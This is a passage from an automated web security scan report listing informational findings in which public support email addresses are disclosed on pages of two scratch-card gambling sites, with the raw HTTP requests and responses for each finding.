Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.11. http://primescratchcards.com/images/aboutus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.12. http://primescratchcards.com/images/affiliates.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.13. http://primescratchcards.com/images/bg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Note that this request for an image path is answered with the same text/html page (Content-Length 19315, same title) as the /images/*.asp paths above, so the addresses reported for those paths are most likely one page served under many URLs rather than separate disclosures.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:54 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=LOLOLGNDDJEFHNPIDEEICOGL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.14. http://primescratchcards.com/images/contactus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.15. http://primescratchcards.com/images/fairplay.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.16. http://primescratchcards.com/images/help.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.17. http://primescratchcards.com/images/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:00 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.18. http://primescratchcards.com/images/media.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.19. http://primescratchcards.com/images/playersclub.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.20. http://primescratchcards.com/images/promotions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.21. http://primescratchcards.com/images/terms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.22. http://primescratchcards.com/images/underage.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The following email address was disclosed in the response: support@primescratchcards.com

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.23. http://scratch.co.uk/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The following email address was disclosed in the response: support@scratch.co.uk

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:41 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="mailto:support@scratch.co.uk">support@scratch.co.uk</a>
...[SNIP]...

21.24. http://scratch.co.uk/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The following email address was disclosed in the response: support@scratch.co.uk (it appears as the visible link text of an anchor whose href points to a contact form on content.scratch.co.uk, not to a mailto: URI)

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a class="popupwindow" href="http://content.scratch.co.uk/ContactUsMail.aspx?popup=1">support@scratch.co.uk</a>
...[SNIP]...

21.25. http://scratch.co.uk/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The following email address was disclosed in the response: support@scratch.co.uk (as link text of an anchor pointing to the contact form on content.scratch.co.uk)

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a class="popupwindow" href="http://content.scratch.co.uk/ContactUsMail.aspx?popup=1">support@scratch.co.uk</a>
...[SNIP]...

21.26. http://scratch.co.uk/help/privacy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The following email address was disclosed in the response (four occurrences): support@scratch.co.uk

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="mailto:support@scratch.co.uk">support@scratch.co.uk</a>
...[SNIP]...
<a href="mailto:support@scratch.co.uk">support@scratch.co.uk</a>
...[SNIP]...
<a href="mailto:support@scratch.co.uk">support@scratch.co.uk</a>
...[SNIP]...
<a href="mailto:support@scratch.co.uk">support@scratch.co.uk</a>
...[SNIP]...

21.27. http://scratch.co.uk/problem-gambling/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The following email address was disclosed in the response (two occurrences): care@scratch.co.uk

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="mailto:care@scratch.co.uk">care@scratch.co.uk</a>
...[SNIP]...
<a href="mailto:care@scratch.co.uk">care@scratch.co.uk</a>
...[SNIP]...

21.28. http://scratch.co.uk/vis-club/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /vis-club/

Issue detail

The following email address was disclosed in the response: vip@scratch.co.uk

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:25 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="mailto:vip@scratch.co.uk">vip@scratch.co.uk</a>
...[SNIP]...

21.29. http://trk.primescratchcards.com/w3c/p3p.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /w3c/p3p.xml

Issue detail

The following email address was disclosed in the response: support@primegaming.com (in the business.contact-info.online.email element of the P3P policy file)

Request

GET /w3c/p3p.xml HTTP/1.1
Host: trk.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK;

Response

HTTP/1.1 200 OK
Content-Length: 1262
Content-Type: text/xml
Last-Modified: Wed, 02 Sep 2009 12:12:30 GMT
Accept-Ranges: bytes
ETag: "ec6bd1a4c62bca1:1bca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:41 GMT
Connection: close

<META xmlns="http://www.w3.org/2002/01/P3Pv1"><POLICY-REFERENCES><EXPIRY max-age="86400"/><POLICY-REF about="#privacy1"><INCLUDE>/*</INCLUDE><COOKIE-INCLUDE name="*" value="*" domain="*" path="*"/></P
...[SNIP]...
